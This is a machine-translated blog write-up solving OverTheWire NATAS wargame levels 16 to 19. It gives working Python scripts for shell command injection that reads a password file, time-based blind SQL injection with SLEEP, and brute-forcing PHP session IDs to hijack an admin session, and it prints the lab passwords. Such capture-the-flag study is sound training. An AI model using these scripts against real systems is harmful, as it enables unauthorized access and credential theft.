Wargames NATAS (16-19) problem solving essays

Natas Level 15 → Level 16
Tips ：shell Script $() You can execute command nesting in quotation marks , Can be in grep In the construction of a grep, for example ：
grep -i " $(grep ^pwd password.txt)"worng doctionary.txt
The program will execute sub shell Go to query password.txt In file pwd character string , If it doesn't match , Will output null , The outer layer is equivalent to execution grep -i worng dictionary.txt, To dictionary.txt Query in worng character string , The query will output wrong character string , conversely , If the inner layer finds , The outer layer will output null . So we can use this point for password blasting . I still use python The implementation code is as follows ：

import urllib.request
import urllib.parse
import re

url = 'http://natas16.natas.labs.overthewire.org'

headers = {
    
    'Host': 'natas16.natas.labs.overthewire.org',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
    'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
    'Authorization': 'Basic bmF0YXMxNjpXYUlIRWFjajYzd25OSUJST0hlcWkzcDl0MG01bmhtaA==',
    'Connection': 'keep-alive',
    'Referer': 'http://natas16.natas.labs.overthewire.org/?needle=accounts&submit=Search',
    'Cookie': '__utma=176859643.1665848136.1639378791.1640070651.1640436097.15; __utmz=176859643.1639378791.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmc=176859643',
    'Upgrade-Insecure-Requests': '1'
}

dic = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'
n1 = '$(grep ^'
n2 = ' /etc/natas_webpass/natas17)accounts'
length = len('AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J')
pattern = re.compile(r'\naccounts')
pwd = ''
values = {
    
    'needle':'',
    'submit':'Search'
}

for i in range(length):
    for ch in dic:
        needle = n1 + pwd + ch + n2
        print(needle)
        values['needle'] = needle       
        data = urllib.parse.urlencode(values)      
        r = url+'?'+ data
        req=urllib.request.Request(url=r,headers=headers,method='GET')
        response = urllib.request.urlopen(req)
        html = response.read().decode('ascii')
        if pattern.search(html):
            continue
        else:
            pwd += ch
            break
print(pwd)

username:natas17
password:8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9cw
Pass through ！

Natas Level 16 → Level 17
Tips ： Open the source code and compare it with the previous discovery , The output is commented out , in the light of mysql Database Injection , Generally, there are three directions ：

• Echo based injection , The server will return some information
• Time based blind annotation , The server does not return any information , It can be cleverly constructed SQL sentence , Judge some information by the response time of the server
• Injection based on error reporting ( A little )
  The previous question is based on echo injection , This question is a blind note based on time
  I use python Write a script , The code is as follows ：

import requests

url = 'http://natas17.natas.labs.overthewire.org/index.php'

headers = {
    
    'Host': 'natas17.natas.labs.overthewire.org',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
    'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
    'Content-Type': 'application/x-www-form-urlencoded',
    'Origin': 'http://natas17.natas.labs.overthewire.org',
    'Authorization': 'Basic bmF0YXMxNzo4UHMzSDBHV2JuNXJkOVM3R21BZGdRTmRraFBrcTljdw==',
    'Connection': 'keep-alive',
    'Referer': 'http://natas17.natas.labs.overthewire.org/',
    'Cookie': '__utma=176859643.1665848136.1639378791.1640436097.1640518734.16; __utmz=176859643.1639378791.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmc=176859643',
    'Upgrade-Insecure-Requests': '1'
}

dic = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'
n1 = 'natas18" AND BINARY password LIKE "'
n2 = '%" AND SLEEP(10)#'
length = len('AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J')
pwd = ''

for i in range(length):
    for ch in dic:
        name = n1 + pwd + ch + n2
        print(name)
        data = {
    'username':name}
        res = requests.post(url,data=data,headers=headers)
        time = res.elapsed.total_seconds()
        print(time)
        if time > 10:
            pwd += ch
            break
print(pwd)        

username:natas18
password:xvKIqDjy4OPv7wCRgDlmj0pFsCsDjhdP
Be careful ： Because of the Internet , It is suggested that the delay time should be longer. I set it here 10 second SLEEP(10), Otherwise it will be wrong
Pass through ！

Natas Level 17 → Level 18
Tips ： After reading the source code, I found that the password can only be obtained by logging in as an administrator , The information of identity authentication is stored in $_SESSION variable , So you can go through session Session hijacking to log in as an administrator ,session Session hijacking requires obtaining session_id, Get session_id Then you can log in as an administrator . So what we need to do now is to get session_id, adopt bp Bag grabbing discovery cookies There is a field in PHPSESSIONID This is what the server uses to determine the identity of users , Then we just need to get the corresponding PHPSESSIONID, Then you can log in as an administrator .
Find out PHPSESSIONID The value of is just a pure number , Found in the source code $maxid=640, It means session_id The biggest is 640. Then we'll blast directly , use python Write the following code ：

import requests
import re

url = 'http://natas18.natas.labs.overthewire.org/'

headers = {
    
    'Host': 'natas18.natas.labs.overthewire.org',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
    'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
    'Authorization': 'Basic bmF0YXMxODp4dktJcURqeTRPUHY3d0NSZ0RsbWowcEZzQ3NEamhkUA==',
    'Connection': 'keep-alive',
    'Upgrade-Insecure-Requests': '1'
}


pattern = re.compile(r'You are logged in as a regular user')

for i in range(640):
    val = str(i)
    cookies = {
    'PHPSESSID':val}
    res = requests.get(url,headers=headers,cookies=cookies)
    if pattern.search(res.content.decode('ascii')):
        print(val)
    else:
        print('session_id=' + val)
        print(res.content.decode('ascii'))
        break
    

Execute the script ,OK Found the administrator's session_id=119 And the next pass
username:natas19
password:4IwIrekcuZlA9OsjOkoUtwU6lhokCPYs
Pass through ！

Natas Level 18 → Level 19
Tips ： The source code of this pass is the same as that of Shangguan , But this is off PHPSESSIONID Not pure numbers , Try a few more times to find the rule PHPSESSIONID front 7 Bits are numbers , Find rules and find them 3xxxxxx Of , Then from 3000000 Start blasting , The last few are fixed ’d61646d696e’, Then it's still the same as the above direct blasting , It's a little long , Have a cup of coffee , The code is as follows ：

import requests
import re

url = 'http://natas19.natas.labs.overthewire.org/index.php'

headers = {
    
    'Host': 'natas19.natas.labs.overthewire.org',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
    'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
    'Authorization': 'Basic bmF0YXMxOTo0SXdJcmVrY3VabEE5T3NqT2tvVXR3VTZsaG9rQ1BZcw==',
    'Connection': 'keep-alive',
    'Upgrade-Insecure-Requests': '1'
}


pattern = re.compile(r'You are an admin')
s_val = 3000000	#PHPSESSIONID front 7 Digit number ,admin Before 7 Is it 3238312

while(1):
    session_id = str(s_val) + 'd61646d696e'
    print('PHPSESSID: ' + session_id)
    cookies = {
    'PHPSESSID':session_id}
    res = requests.get(url,headers=headers,cookies=cookies)
    if pattern.search(res.content.decode('ascii')):
        print('session_id=' + session_id)
        print(res.content.decode('ascii'))
        break
    s_val += 1

After running the script, I found ,session_id=3238312d61646d696e, It's the administrator's session_id
username:natas20
password:eofm3Wsshxc5bwtVnEuGIlr7ivb9KABF
Pass through ！